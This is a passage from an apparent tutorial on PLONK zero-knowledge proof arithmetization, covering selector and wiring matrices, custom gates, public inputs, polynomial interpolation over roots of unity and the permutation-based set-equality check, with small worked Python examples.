&lt;p&gt;And we saw that the claim is true for our particular execution:&lt;br &#x2F;&gt;
$$ 2 \times 0 + 3 \times 0 + 2 \times 3 \times 1 + 6 \times (-1) + 0 = 0 $$&lt;br &#x2F;&gt;
$$ 6 \times 1 + 3 \times 1 + 6 \times 3 \times 0 + 9 \times (-1) + 0 = 0 $$&lt;br &#x2F;&gt;
$$ 9 \times 1 + 0 \times 0 + 9 \times 0 \times 0 + 8 \times (-1) + (-1) = 0 $$&lt;&#x2F;p&gt;
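&lt;p&gt;The check above is mechanical, so it is easy to script. Here is a minimal sketch over plain integers (real PLONK works over a finite field), with the unused operand of the last gate taken as $0$:&lt;&#x2F;p&gt;

```python
# Every trace row (A, B, C) must satisfy its gate equation:
#   A*Q_L + B*Q_R + A*B*Q_M + C*Q_O + Q_C == 0
Q = [
    (0, 0, 1, -1, 0),   # multiplication gate: u = e * x
    (1, 1, 0, -1, 0),   # addition gate: v = u + x
    (1, 0, 0, -1, -1),  # add-constant gate: w = v + (-1)
]
T = [
    (2, 3, 6),  # e = 2, x = 3, u = 6
    (6, 3, 9),  # u = 6, x = 3, v = 9
    (9, 0, 8),  # v = 9, unused operand as 0, w = 8
]
for (ql, qr, qm, qo, qc), (a, b, c) in zip(Q, T):
    assert a*ql + b*qr + a*b*qm + c*qo + qc == 0
```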
&lt;p&gt;Not crucial to our example, but multiplication by constant C can be represented by:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;C&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;As you might have already noticed, there are several ways to represent the same gate in some cases. We’ll exploit this in a moment.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-v-matrix&quot;&gt;The $V$ matrix&lt;&#x2F;h3&gt;
&lt;p&gt;The claim in the previous section is not an “if and only if” statement because the following trace columns do satisfy the equations but do not correspond to a valid execution:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;19&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The $V$ matrix encodes how the result of one gate is carried to the right or left operand of a subsequent one. These connections are called &lt;em&gt;wirings&lt;&#x2F;em&gt;. Like the $Q$ matrix, it’s independent of the individual evaluation. It consists of indices for all input and intermediate variables. In this case, that matrix is:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;L&lt;&#x2F;th&gt;&lt;th&gt;R&lt;&#x2F;th&gt;&lt;th&gt;O&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Here $0$ is the index of $e$, $1$ is the index of $x$, $2$ is the index of $u$, $3$ is the index of $v$, and $4$ is the index of the output $w$. Now we can update the claim to have an “if and only if” statement.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Claim:&lt;&#x2F;strong&gt; Let $T$ be a matrix with columns $A, B, C$. It corresponds to a proper evaluation of the circuit if and only if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} = 0,$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k, l}$ we have $T_{i,j} = T_{k, l}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;So now, our malformed example does not pass the second check.&lt;&#x2F;p&gt;
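&lt;p&gt;Both conditions of the claim can be sketched in a few lines, again over plain integers rather than field elements, with &lt;code&gt;None&lt;&#x2F;code&gt; standing for the unused &lt;code&gt;-&lt;&#x2F;code&gt; entries of the tables:&lt;&#x2F;p&gt;

```python
Q = [(0, 0, 1, -1, 0), (1, 1, 0, -1, 0), (1, 0, 0, -1, -1)]
V = [(0, 1, 2), (2, 1, 3), (3, None, 4)]

def is_valid(T):
    # condition (1): every row satisfies its gate equation
    for (ql, qr, qm, qo, qc), row in zip(Q, T):
        a, b, c = (x if x is not None else 0 for x in row)
        if a*ql + b*qr + a*b*qm + c*qo + qc != 0:
            return False
    # condition (2): positions wired to the same variable hold equal values
    seen = {}
    for i in range(len(V)):
        for j in range(3):
            var = V[i][j]
            if var is None:
                continue
            if var in seen and seen[var] != T[i][j]:
                return False
            seen[var] = T[i][j]
    return True

assert is_valid([(2, 3, 6), (6, 3, 9), (9, None, 8)])
# the malformed trace from the text satisfies (1) but fails (2)
assert not is_valid([(2, 3, 6), (0, 0, 0), (20, None, 19)])
```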
&lt;h3 id=&quot;custom-gates&quot;&gt;Custom gates&lt;&#x2F;h3&gt;
&lt;p&gt;Our matrices are fine now, but they can be optimized. Let’s do that to showcase this flexibility of PLONK and also reduce the size of our example.&lt;&#x2F;p&gt;
&lt;p&gt;PLONK can construct more sophisticated gates as combinations of the five columns. Therefore, the same program can be expressed in multiple ways. In our case, we can merge all three gates into a single custom gate. The $Q$ matrix ends up being a single row.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;and also the $V$ matrix&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;L&lt;&#x2F;th&gt;&lt;th&gt;R&lt;&#x2F;th&gt;&lt;th&gt;O&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The trace matrix for this representation is just&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And we check that it satisfies the equation&lt;&#x2F;p&gt;
&lt;p&gt;$$ 2 \times 0 + 3 \times 1 + 2 \times 3 \times 1 + 8 \times (-1) + (-1) = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;Of course, we cannot always squash an entire program into a single gate.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;public-inputs&quot;&gt;Public inputs&lt;&#x2F;h3&gt;
&lt;p&gt;Aside from the gates that execute the program operations, additional rows must be incorporated into these matrices. This is because the prover must demonstrate not only that she ran the program but also that she used the appropriate inputs. Furthermore, the proof must include an assertion of the output value. As a result, a few extra rows are necessary. In our case, these are the first two and the last one. The original gate now sits in the third row.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And this is the updated $V$ matrix&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;L&lt;&#x2F;th&gt;&lt;th&gt;R&lt;&#x2F;th&gt;&lt;th&gt;O&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The first row forces the variable with index $0$ to take the value $3$. Similarly, the second row forces the variable with an index of $1$ to take the value $8$. These two will be the public inputs of the verifier. The last row checks that the program’s output is the claimed one.&lt;&#x2F;p&gt;
&lt;p&gt;And the trace matrix is now&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;With these extra rows, equations add up to zero only for valid executions of the program with input $3$ and output $8$.&lt;&#x2F;p&gt;
&lt;p&gt;An astute observer would notice that the matrix $Q$ is no longer independent of the specific evaluation after incorporating these new rows. This is because the first two rows of the $Q_C$ column contain concrete values specific to a particular execution instance. To maintain independence, we can remove these values and consider them as part of an extra one-column matrix called $PI$ (short for Public Input), putting zeros in the corresponding entries of the $Q_C$ column. The $PI$ column has zeros in all rows not related to public inputs. The prover and verifier are responsible for filling in the $PI$ matrix. In our example, it is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$PI$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And the final $Q$ matrix is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We ended up with two matrices that depend only on the program, $Q$ and $V$, and two matrices that depend on a particular evaluation, namely the $ABC$ and $PI$ matrices. The updated version of the claim is the following:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Claim:&lt;&#x2F;strong&gt; Let $T$ be a matrix with columns $A, B, C$. It corresponds to an evaluation of the circuit if and only if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;from-matrices-to-polynomials&quot;&gt;From matrices to polynomials&lt;&#x2F;h3&gt;
&lt;p&gt;The previous section showed how the arithmetization process works in PLONK. For a program with $n$ public inputs and $m$ gates, we constructed two matrices $Q$ and $V$ of sizes $(n + m + 1) \times 5$ and $(n + m + 1) \times 3$ that satisfy the following. Let $N = n + m + 1.$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Claim:&lt;&#x2F;strong&gt; Let $T$ be a $N \times 3$ matrix with columns $A, B, C$ and $PI$ a $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $PI_i = 0$ for all $i&amp;gt;n$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
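&lt;p&gt;As a hedged sketch of condition (1) in this final form, here is the check for our example over plain integers. Note that the computation gate is written as the merged custom gate $(0, 1, 1, -1, -1)$, so that the equation vanishes on the trace row $(2, 3, 8)$; unused &lt;code&gt;-&lt;&#x2F;code&gt; entries are taken as $0$:&lt;&#x2F;p&gt;

```python
Q = [
    (-1, 0, 0, 0, 0),   # public input row: forces A_0 = PI_0
    (-1, 0, 0, 0, 0),   # public input row: forces A_1 = PI_1
    (0, 1, 1, -1, -1),  # the computation gate
    (1, -1, 0, 0, 0),   # output row: forces A_3 = B_3
]
PI = [3, 8, 0, 0]
T = [(3, 0, 0), (8, 0, 0), (2, 3, 8), (8, 8, 0)]

# each row must satisfy A*Q_L + B*Q_R + A*B*Q_M + C*Q_O + Q_C + PI == 0
residuals = [
    a*ql + b*qr + a*b*qm + c*qo + qc + pi
    for (ql, qr, qm, qo, qc), (a, b, c), pi in zip(Q, T, PI)
]
assert residuals == [0, 0, 0, 0]
```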
&lt;p&gt;Polynomials enter the picture now to squash most of these equations. We will translate the set of all equations in conditions (1) and (2) into just a few equations on polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;Let $\omega$ be a primitive $N$-th root of unity and let $H = \{\omega^i: 0\leq i &amp;lt; N\}$. Let $a, b, c, q_L, q_R, q_M, q_O, q_C, pi$ be the polynomials of degree at most $N-1$ that interpolate the columns $A, B, C, Q_L, Q_R, Q_M, Q_O, Q_C, PI$ at the domain $H$. This means, for example, that $a(\omega^i) = A_i$ for all $i$, and similarly for all the other columns (see our &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;previous post on STARKs&lt;&#x2F;a&gt; for examples on interpolation).&lt;&#x2F;p&gt;
&lt;p&gt;With this, condition (1) of the claim is equivalent to $$a(x) q_L(x) + b(x) q_R(x) + a(x) b(x) q_M(x) + c(x) q_O(x) + q_C(x) + pi(x) = 0$$ for all $x$ in $H$. This is just by definition of the polynomials. But in the land of polynomials, this is also equivalent to:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. There exists a polynomial $t$ such that $$a q_L + b q_R + a b q_M + c q_O + q_C + pi = z_H t$$, where $z_H$ is the polynomial $X^N - 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To reduce condition (2) to polynomial equations, we must introduce the concept of a permutation. A permutation is a rearrangement of a set, usually denoted $\sigma$. For finite sets, it is a map from a set to itself that takes all values. In our case, the set will be the set of all pairs&lt;br &#x2F;&gt;
$$I=\{(i,j): 0\leq i &amp;lt; N \text{ and } 0\leq j &amp;lt; 3\}$$&lt;br &#x2F;&gt;
The matrix $V$ induces a permutation of this set where $\sigma((i,j))$ is equal to the indices of the &lt;em&gt;next&lt;&#x2F;em&gt; occurrence of the value at position $(i,j)$. If you are already at the last occurrence, go back to the first one. By &lt;em&gt;next&lt;&#x2F;em&gt;, we mean the following occurrence, as if the columns were stacked on top of each other. Let’s see how this works in the example circuit. Recall $V$ is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;L&lt;&#x2F;th&gt;&lt;th&gt;R&lt;&#x2F;th&gt;&lt;th&gt;O&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Writing positions as (row, column) pairs, the permutation in this case is the map $\sigma((0,0)) = (2,1)$, $\sigma((2,1)) = (0,0)$, $\sigma((1,0)) = (3,0)$, $\sigma((3,0)) = (1,0)$, $\sigma((2,0)) = (2,0)$, $\sigma((3,1)) = (2,2)$, $\sigma((2,2)) = (3,1)$. The positions with &lt;code&gt;-&lt;&#x2F;code&gt; values don’t matter right now.&lt;&#x2F;p&gt;
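&lt;p&gt;As a hedged sketch, this permutation can be derived mechanically from $V$, with positions written as (row, column) pairs and &lt;code&gt;None&lt;&#x2F;code&gt; for the unused &lt;code&gt;-&lt;&#x2F;code&gt; entries:&lt;&#x2F;p&gt;

```python
V = [(0, None, None), (1, None, None), (2, 0, 3), (1, 3, None)]

# collect the occurrences of each variable index, stacking the
# columns L, R, O on top of each other
occurrences = {}
for col in range(3):
    for row in range(len(V)):
        var = V[row][col]
        if var is not None:
            occurrences.setdefault(var, []).append((row, col))

# each position maps to the next occurrence of its variable,
# wrapping around to the first one
sigma = {}
for positions in occurrences.values():
    for idx, pos in enumerate(positions):
        sigma[pos] = positions[(idx + 1) % len(positions)]

assert sigma[(0, 0)] == (2, 1)  # variable 0: L column, then R column
assert sigma[(1, 0)] == (3, 0)  # variable 1 appears twice in L
assert sigma[(2, 0)] == (2, 0)  # variable 2 occurs once: fixed point
assert sigma[(2, 2)] == (3, 1)  # variable 3: O column wraps back to R
```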
&lt;p&gt;It’s not hard to see that condition (2) is equivalent to: for all $(i,j)\in I$, $T_{i,j} = T_{\sigma((i,j))}$.&lt;&#x2F;p&gt;
&lt;p&gt;A little less obvious is that this condition is, in turn, equivalent to checking whether the following sets $A$ and $B$ are equal&lt;br &#x2F;&gt;
$$A = \{((i,j), T_{i,j}): (i,j) \in I\}$$&lt;br &#x2F;&gt;
$$B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}.$$&lt;br &#x2F;&gt;
The proof of this equivalence is straightforward. Give it a try!&lt;&#x2F;p&gt;
&lt;p&gt;In our example, the sets in question are respectively&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\{((0,0), T_{0,0}), ((1,0), T_{1,0}), ((2,0), T_{2,0}), ((3,0), T_{3,0}), \newline ((2,1), T_{2,1}), ((3,1), T_{3,1}), ((2,2), T_{2,2})\}&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\{((2,1), T_{0,0}), ((3,0), T_{1,0}), ((2,0), T_{2,0}), ((1,0), T_{3,0}), \newline ((0,0), T_{2,1}), ((2,2), T_{3,1}), ((3,1), T_{2,2}) \}. \end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;You can check these sets coincide by inspection. Recall our trace matrix $T$ is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Checking the equality of these sets can be reduced to polynomial equations. It is a very nice method that PLONK uses. To understand it better, let’s start with a more straightforward case.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;equality-of-sets&quot;&gt;Equality of sets&lt;&#x2F;h4&gt;
&lt;p&gt;Suppose we have two sets $A = \{a_0, a_1 \}$ and $B = \{b_0, b_1\}$ of two field elements each in $\mathbb{F}$, and we are interested in checking whether they are equal.&lt;&#x2F;p&gt;
&lt;p&gt;One thing we could do is compute $a_0a_1$ and $b_0b_1$ and compare them. If the sets are equal, then those elements are necessarily identical.&lt;&#x2F;p&gt;
